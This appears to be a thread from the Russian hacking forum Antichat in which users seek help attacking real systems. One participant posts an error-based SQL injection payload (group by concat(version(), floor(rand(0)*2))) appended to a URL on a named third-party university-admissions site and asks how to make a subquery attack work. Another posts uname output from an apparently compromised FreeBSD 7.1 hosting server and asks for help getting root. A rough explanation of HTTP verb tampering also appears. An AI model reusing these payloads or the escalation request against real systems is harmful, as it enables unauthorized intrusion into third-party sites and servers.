ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Пропиши в консоле uname-a и покажи что выдало.

$ uname-a

Query did not return anything

с пробелом надо uname -a

FreeBSD dh01.hostmedia.net 7.1-RELEASE FreeBSD 7.1-RELEASE #0: Mon Feb 2 17:54:17 EET 2009 root@dm1.wugluskr.org:/usr/src/sys/amd64/compile/iServer amd64

Расскажите про уязвимость HTTP Verb Tampering , читал мануалы. Так понял, это из GET запроса в livehttp ( мазила ) менять на POST запрос и все?

Но что то не получается...

Кто поможет крутануть это дело с подзапросом (без error based)

http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68

http://www.studyinpoland.pl/ru/index.php/component/jumi/university?view=application&schoolid=68+or+1+group +by+concat(version(),floor(rand(0)*2))having+min(0 )+or+1--+

идем в раздел статей и курим до утра

Насколько я понял, уязвимость заключается в неправильной настройке доступа к данным.

Например ты хочешь прочитать .htaccess, но тебе вылетает 403. Предположим, что в этом случае передается в запросе параметр name с логином юзера, и если он равен 'admin', то доступ разрешен, если нет то 403. Так вот изменив в таком запросе свой логин на 'admin', ты получишь доступ файлу.

Помогите новичку получить root на FreeBSD 7.1-RELEASE ,не могу разобраться,спасибо.